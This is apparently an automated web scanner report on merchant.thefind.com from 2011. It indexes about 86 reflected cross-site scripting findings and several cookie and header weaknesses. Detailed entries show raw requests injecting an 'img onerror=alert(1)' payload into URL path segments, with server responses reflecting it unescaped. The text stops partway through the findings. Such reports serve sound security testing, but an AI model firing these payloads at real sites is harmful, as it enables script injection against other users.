1. Cross-site scripting (reflected)
1.1. https://merchant.thefind.com/css/cobrands/base.css [REST URL parameter 1]
1.2. https://merchant.thefind.com/css/cobrands/base.css [REST URL parameter 2]
1.3. https://merchant.thefind.com/css/cobrands/base.css [REST URL parameter 3]
1.4. https://merchant.thefind.com/css/mc/calendar.css [REST URL parameter 1]
1.5. https://merchant.thefind.com/css/mc/calendar.css [REST URL parameter 2]
1.6. https://merchant.thefind.com/css/mc/calendar.css [REST URL parameter 3]
1.7. https://merchant.thefind.com/css/mc/callout.css [REST URL parameter 1]
1.8. https://merchant.thefind.com/css/mc/callout.css [REST URL parameter 2]
1.9. https://merchant.thefind.com/css/mc/callout.css [REST URL parameter 3]
1.10. https://merchant.thefind.com/css/mc/claim_store.css [REST URL parameter 1]
1.11. https://merchant.thefind.com/css/mc/claim_store.css [REST URL parameter 2]
1.12. https://merchant.thefind.com/css/mc/claim_store.css [REST URL parameter 3]
1.13. https://merchant.thefind.com/css/mc/common.css [REST URL parameter 1]
1.14. https://merchant.thefind.com/css/mc/common.css [REST URL parameter 2]
1.15. https://merchant.thefind.com/css/mc/common.css [REST URL parameter 3]
1.16. https://merchant.thefind.com/css/mc/layout.css [REST URL parameter 1]
1.17. https://merchant.thefind.com/css/mc/layout.css [REST URL parameter 2]
1.18. https://merchant.thefind.com/css/mc/layout.css [REST URL parameter 3]
1.19. https://merchant.thefind.com/css/mc/mc_common.css [REST URL parameter 1]
1.20. https://merchant.thefind.com/css/mc/mc_common.css [REST URL parameter 2]
1.21. https://merchant.thefind.com/css/mc/mc_common.css [REST URL parameter 3]
1.22. https://merchant.thefind.com/css/ui/infobox.css [REST URL parameter 1]
1.23. https://merchant.thefind.com/css/ui/infobox.css [REST URL parameter 2]
1.24. https://merchant.thefind.com/css/ui/infobox.css [REST URL parameter 3]
1.25. https://merchant.thefind.com/css/utils/ui.css [REST URL parameter 1]
1.26. https://merchant.thefind.com/css/utils/ui.css [REST URL parameter 2]
1.27. https://merchant.thefind.com/css/utils/ui.css [REST URL parameter 3]
1.28. https://merchant.thefind.com/favicon.ico [REST URL parameter 1]
1.29. https://merchant.thefind.com/mc/MerchantProgram.fhtml [REST URL parameter 1]
1.30. https://merchant.thefind.com/mc/MerchantProgram.fhtml [REST URL parameter 2]
1.31. https://merchant.thefind.com/mc/a [REST URL parameter 1]
1.32. https://merchant.thefind.com/mc/a [REST URL parameter 2]
1.33. https://merchant.thefind.com/scripts/mc/calendar.js [REST URL parameter 1]
1.34. https://merchant.thefind.com/scripts/mc/calendar.js [REST URL parameter 2]
1.35. https://merchant.thefind.com/scripts/mc/calendar.js [REST URL parameter 3]
1.36. https://merchant.thefind.com/scripts/mc/callout.js [REST URL parameter 1]
1.37. https://merchant.thefind.com/scripts/mc/callout.js [REST URL parameter 2]
1.38. https://merchant.thefind.com/scripts/mc/callout.js [REST URL parameter 3]
1.39. https://merchant.thefind.com/scripts/mc/claim_store.js [REST URL parameter 1]
1.40. https://merchant.thefind.com/scripts/mc/claim_store.js [REST URL parameter 2]
1.41. https://merchant.thefind.com/scripts/mc/claim_store.js [REST URL parameter 3]
1.42. https://merchant.thefind.com/scripts/mc/init.js [REST URL parameter 1]
1.43. https://merchant.thefind.com/scripts/mc/init.js [REST URL parameter 2]
1.44. https://merchant.thefind.com/scripts/mc/init.js [REST URL parameter 3]
1.45. https://merchant.thefind.com/scripts/mc/mc_common.js [REST URL parameter 1]
1.46. https://merchant.thefind.com/scripts/mc/mc_common.js [REST URL parameter 2]
1.47. https://merchant.thefind.com/scripts/mc/mc_common.js [REST URL parameter 3]
1.48. https://merchant.thefind.com/scripts/mc/mc_utils.js [REST URL parameter 1]
1.49. https://merchant.thefind.com/scripts/mc/mc_utils.js [REST URL parameter 2]
1.50. https://merchant.thefind.com/scripts/mc/mc_utils.js [REST URL parameter 3]
1.51. https://merchant.thefind.com/scripts/mc/prototype.js [REST URL parameter 1]
1.52. https://merchant.thefind.com/scripts/mc/prototype.js [REST URL parameter 2]
1.53. https://merchant.thefind.com/scripts/mc/prototype.js [REST URL parameter 3]
1.54. https://merchant.thefind.com/scripts/tplmgr/tplmgr.js [REST URL parameter 1]
1.55. https://merchant.thefind.com/scripts/tplmgr/tplmgr.js [REST URL parameter 2]
1.56. https://merchant.thefind.com/scripts/tplmgr/tplmgr.js [REST URL parameter 3]
1.57. https://merchant.thefind.com/scripts/ui/infobox.js [REST URL parameter 1]
1.58. https://merchant.thefind.com/scripts/ui/infobox.js [REST URL parameter 2]
1.59. https://merchant.thefind.com/scripts/ui/infobox.js [REST URL parameter 3]
1.60. https://merchant.thefind.com/scripts/utils/ajaxlib.js [REST URL parameter 1]
1.61. https://merchant.thefind.com/scripts/utils/ajaxlib.js [REST URL parameter 2]
1.62. https://merchant.thefind.com/scripts/utils/ajaxlib.js [REST URL parameter 3]
1.63. https://merchant.thefind.com/scripts/utils/browser.js [REST URL parameter 1]
1.64. https://merchant.thefind.com/scripts/utils/browser.js [REST URL parameter 2]
1.65. https://merchant.thefind.com/scripts/utils/browser.js [REST URL parameter 3]
1.66. https://merchant.thefind.com/scripts/utils/elation.js [REST URL parameter 1]
1.67. https://merchant.thefind.com/scripts/utils/elation.js [REST URL parameter 2]
1.68. https://merchant.thefind.com/scripts/utils/elation.js [REST URL parameter 3]
1.69. https://merchant.thefind.com/scripts/utils/events.js [REST URL parameter 1]
1.70. https://merchant.thefind.com/scripts/utils/events.js [REST URL parameter 2]
1.71. https://merchant.thefind.com/scripts/utils/events.js [REST URL parameter 3]
1.72. https://merchant.thefind.com/scripts/utils/initjquery.js [REST URL parameter 1]
1.73. https://merchant.thefind.com/scripts/utils/initjquery.js [REST URL parameter 2]
1.74. https://merchant.thefind.com/scripts/utils/initjquery.js [REST URL parameter 3]
1.75. https://merchant.thefind.com/scripts/utils/msie-xpath.js [REST URL parameter 1]
1.76. https://merchant.thefind.com/scripts/utils/msie-xpath.js [REST URL parameter 2]
1.77. https://merchant.thefind.com/scripts/utils/msie-xpath.js [REST URL parameter 3]
1.78. https://merchant.thefind.com/scripts/utils/panel.js [REST URL parameter 1]
1.79. https://merchant.thefind.com/scripts/utils/panel.js [REST URL parameter 2]
1.80. https://merchant.thefind.com/scripts/utils/panel.js [REST URL parameter 3]
1.81. https://merchant.thefind.com/scripts/utils/tracking.js [REST URL parameter 1]
1.82. https://merchant.thefind.com/scripts/utils/tracking.js [REST URL parameter 2]
1.83. https://merchant.thefind.com/scripts/utils/tracking.js [REST URL parameter 3]
1.84. https://merchant.thefind.com/scripts/utils/ui.js [REST URL parameter 1]
1.85. https://merchant.thefind.com/scripts/utils/ui.js [REST URL parameter 2]
1.86. https://merchant.thefind.com/scripts/utils/ui.js [REST URL parameter 3]
2. Password field with autocomplete enabled
3. SSL cookie without secure flag set
3.1. https://merchant.thefind.com/
3.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml
4. Cookie scoped to parent domain
4.1. https://merchant.thefind.com/
4.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml
5. Cross-domain Referer leakage
5.1. https://merchant.thefind.com/
5.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml
6. Cross-domain script include
6.1. https://merchant.thefind.com/
6.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml
6.3. https://merchant.thefind.com/mc/a
7. Cookie without HttpOnly flag set
7.1. https://merchant.thefind.com/
7.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/cobrands/base.css |
GET /css18f99<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:40 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 89 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css18f99<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/cobrands/base.css |
GET /css/cobrandse1a76<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:09 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 89 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css.cobrandse1a76<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/cobrands/base.css |
GET /css/cobrands/3c5ba<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:59 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9549 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: css.cobrands.3c5ba<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/calendar.css |
GET /csse511a<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:39 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 87 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: csse511a<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/calendar.css |
GET /css/mc2cca7<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:10 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 87 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css.mc2cca7<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/calendar.css |
GET /css/mc/bacf3<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:01 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9544 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: css.mc.bacf3<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/callout.css |
GET /css3d711<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:39 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 86 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css3d711<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/callout.css |
GET /css/mc8a441<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:10 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 86 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css.mc8a441<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/callout.css |
GET /css/mc/573ef<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:00 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9544 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: css.mc.573ef<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/claim_store.css |
GET /cssf8aea<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:39 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 90 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: cssf8aea<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/claim_store.css |
GET /css/mc16147<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:11 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 90 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css.mc16147<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/claim_store.css |
GET /css/mc/d16b7<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:02 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9544 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: css.mc.d16b7<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/common.css |
GET /cssd2620<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:39 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 85 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: cssd2620<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/common.css |
GET /css/mc7f252<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:10 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 85 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css.mc7f252<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/common.css |
GET /css/mc/74556<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:01 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9544 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: css.mc.74556<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/layout.css |
GET /css57b34<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:19 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK Content-Length: 85 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [Could not find component: css57b34<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /css/mc/layout.css |
